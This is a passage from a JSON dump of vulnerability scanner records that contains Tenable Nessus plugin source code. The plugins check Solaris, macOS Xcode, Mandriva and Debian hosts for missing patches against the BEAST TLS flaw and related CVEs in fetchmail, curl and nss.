value:\"2018/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:125358\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.2.4,REV=2006.11.16.20.40\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.6.4,REV=2006.11.16.20.40\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.6.4,REV=2006.11.16.20.40\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.11.4,REV=2006.11.16.20.40\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.11.4,REV=2006.11.16.20.40\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"125358-15\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.11.4,REV=2006.11.16.20.40\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:59", "description": "The remote Mac OS X host has a version of Apple Xcode installed that is prior to 4.4. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability, known as BEAST, exists in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API.\n (CVE-2011-3389)\n\n - An information disclosure vulnerability exists that may allow a specially crafted App Store application to read entries in the keychain. (CVE-2012-3698)", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "nessus", "title": "Apple Xcode < 4.4 Multiple Vulnerabilities (Mac OS X) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-3698"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apple:xcode"], "id": "MACOSX_XCODE_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/61413", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61413);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3698\");\n script_bugtraq_id(49778, 54679);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Apple Xcode < 4.4 Multiple Vulnerabilities (Mac OS X) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Apple Xcode installed that is prior to 4.4. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability, known as BEAST, exists in the SSL 3.0 and TLS 1.0 protocols due\n to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining\n (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using\n a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that\n uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API.\n (CVE-2011-3389)\n\n - An information disclosure vulnerability exists that may allow a specially crafted App Store application to\n read entries in the keychain. (CVE-2012-3698)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT5416\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Xcode version 4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3698\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:xcode\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_xcode_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Apple Xcode\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\n\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os))\n audit(AUDIT_OS_NOT, 'macOS or Mac OS X');\n\napp_info = vcf::get_app_info(app:'Apple Xcode');\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'fixed_version' : '4.4' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:08", "description": "Multiple vulnerabilities has been found and corrected in fetchmail :\n\nFetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which contains a switch to disable a countermeasure against certain attacks against block ciphers that permit guessing the initialization vectors, providing that an attacker can make the application (fetchmail) encrypt some data for him -- which is not easily the case (aka a BEAST attack) (CVE-2011-3389).\n\nA denial of service flaw was found in the way Fetchmail, a remote mail retrieval and forwarding utility, performed base64 decoding of certain NTLM server responses. Upon sending the NTLM authentication request, Fetchmail did not check if the received response was actually part of NTLM protocol exchange, or server-side error message and session abort. A rogue NTML server could use this flaw to cause fetchmail executable crash (CVE-2012-3482).\n\nThis advisory provides the latest version of fetchmail (6.3.22) which is not vulnerable to these issues.", "cvss3": {}, "published": "2013-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : fetchmail (MDVSA-2013:037)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-3482"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:fetchmail", "p-cpe:/a:mandriva:linux:fetchmail-daemon", "p-cpe:/a:mandriva:linux:fetchmailconf", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-037.NASL", "href": "https://www.tenable.com/plugins/nessus/66051", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:037. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66051);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3482\");\n script_bugtraq_id(49388, 49778, 54987);\n script_xref(name:\"MDVSA\", value:\"2013:037\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Mandriva Linux Security Advisory : fetchmail (MDVSA-2013:037)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple vulnerabilities has been found and corrected in fetchmail :\n\nFetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which\ncontains a switch to disable a countermeasure against certain attacks\nagainst block ciphers that permit guessing the initialization vectors,\nproviding that an attacker can make the application (fetchmail)\nencrypt some data for him -- which is not easily the case (aka a BEAST\nattack) (CVE-2011-3389).\n\nA denial of service flaw was found in the way Fetchmail, a remote mail\nretrieval and forwarding utility, performed base64 decoding of certain\nNTLM server responses. Upon sending the NTLM authentication request,\nFetchmail did not check if the received response was actually part of\nNTLM protocol exchange, or server-side error message and session\nabort. A rogue NTML server could use this flaw to cause fetchmail\nexecutable crash (CVE-2012-3482).\n\nThis advisory provides the latest version of fetchmail (6.3.22) which\nis not vulnerable to these issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.fetchmail.info/fetchmail-SA-2012-01.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.fetchmail.info/fetchmail-SA-2012-02.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected fetchmail, fetchmail-daemon and / or fetchmailconf\npackages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmail-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fetchmailconf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"fetchmail-6.3.22-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"fetchmail-daemon-6.3.22-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"fetchmailconf-6.3.22-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:45", "description": "Multiple vulnerabilities has been found and corrected in curl :\n\ncurl is vulnerable to a SSL CBC IV vulnerability when built to use OpenSSL for the SSL/TLS layer. A work-around has been added to mitigate the problem (CVE-2011-3389).\n\ncurl is vulnerable to a data injection attack for certain protocols through control characters embedded or percent-encoded in URLs (CVE-2012-0036).\n\nThe updated packages have been patched to correct these issues.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : curl (MDVSA-2012:058)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:curl", "p-cpe:/a:mandriva:linux:curl-examples", "p-cpe:/a:mandriva:linux:lib64curl-devel", "p-cpe:/a:mandriva:linux:lib64curl4", "p-cpe:/a:mandriva:linux:libcurl-devel", "p-cpe:/a:mandriva:linux:libcurl4", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-058.NASL", "href": "https://www.tenable.com/plugins/nessus/58759", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:058. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58759);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-0036\");\n script_bugtraq_id(49778, 51665);\n script_xref(name:\"MDVSA\", value:\"2012:058\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Mandriva Linux Security Advisory : curl (MDVSA-2012:058)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple vulnerabilities has been found and corrected in curl :\n\ncurl is vulnerable to a SSL CBC IV vulnerability when built to use\nOpenSSL for the SSL/TLS layer. A work-around has been added to\nmitigate the problem (CVE-2011-3389).\n\ncurl is vulnerable to a data injection attack for certain protocols\nthrough control characters embedded or percent-encoded in URLs\n(CVE-2012-0036).\n\nThe updated packages have been patched to correct these issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://curl.haxx.se/docs/CVE-2012-0036.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://curl.haxx.se/docs/adv_20120124B.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://curl.haxx.se/docs/manpage.html#--ssl-allow-beast\");\n script_set_attribute(attribute:\"see_also\", value:\"https://curl.haxx.se/libcurl/c/curl_easy_setopt.html#CURLOPTSSLOPTIONS\");\n script_set_attribute(attribute:\"see_also\", value:\"http://thread.gmane.org/gmane.comp.web.curl.library/34659\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:curl-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64curl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64curl4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcurl4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"curl-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"curl-examples-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64curl-devel-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64curl4-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libcurl-devel-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libcurl4-7.20.1-2.2mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"curl-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"curl-examples-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64curl-devel-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64curl4-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libcurl-devel-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libcurl4-7.21.7-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:11:02", "description": "nss 3.12.8-1+squeeze11 fixes two security issues :\n\nCVE-2011-3389\n\nSSL 3.0 and TLS 1.0 connections were vulnerable to some chosen plaintext attacks which allowed man-in-the middle attackers to obtain plaintext HTTP headers on an HTTPS session. This issue is known as the 'BEAST' attack.\n\nCVE-2014-1569\n\nPossible information leak with too-permissive ASN.1 DER decoding of length.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-154-1 : nss security update (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2014-1569"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libnss3-1d", "p-cpe:/a:debian:debian_linux:libnss3-1d-dbg", "p-cpe:/a:debian:debian_linux:libnss3-dev", "p-cpe:/a:debian:debian_linux:libnss3-tools", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-154.NASL", "href": "https://www.tenable.com/plugins/nessus/82137", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-154-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82137);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2014-1569\");\n script_bugtraq_id(49388, 49778, 71675);\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Debian DLA-154-1 : nss security update (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"nss 3.12.8-1+squeeze11 fixes two security issues :\n\nCVE-2011-3389\n\nSSL 3.0 and TLS 1.0 connections were vulnerable to some chosen\nplaintext attacks which allowed man-in-the middle attackers to obtain\nplaintext HTTP headers on an HTTPS session. This issue is known as the\n'BEAST' attack.\n\nCVE-2014-1569\n\nPossible information leak with too-permissive ASN.1 DER decoding of\nlength.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2015/02/msg00008.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/squeeze-lts/nss\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss3-1d\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss3-1d-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss3-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss3-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libnss3-1d\", reference:\"3.12.8-1+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss3-1d-dbg\", reference:\"3.12.8-1+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss3-dev\", reference:\"3.12.8-1+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss3-tools\", reference:\"3.12.8-1+squeeze11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:49", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a 'BEAST' attack. (CVE-2011-3389)\n\n - Fetchmail 5.0.8 through 6.3.21, when using NTLM authentication in debug mode, allows remote NTLM servers to (1) cause a denial of service (crash and delayed delivery of inbound mail) via a crafted NTLM response that triggers an out-of-bounds read in the base64 decoder, or (2) obtain sensitive information from memory via an NTLM Type 2 message with a crafted Target Name structure, which triggers an out-of-bounds read.\n (CVE-2012-3482)", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : fetchmail (multiple_vulnerabilities_in_fetchmail) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-3482"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:fetchmail"], "id": "SOLARIS11_FETCHMAIL_20121016.NASL", "href": "https://www.tenable.com/plugins/nessus/80605", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80605);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3482\");\n script_xref(name:\"CEA-ID\", 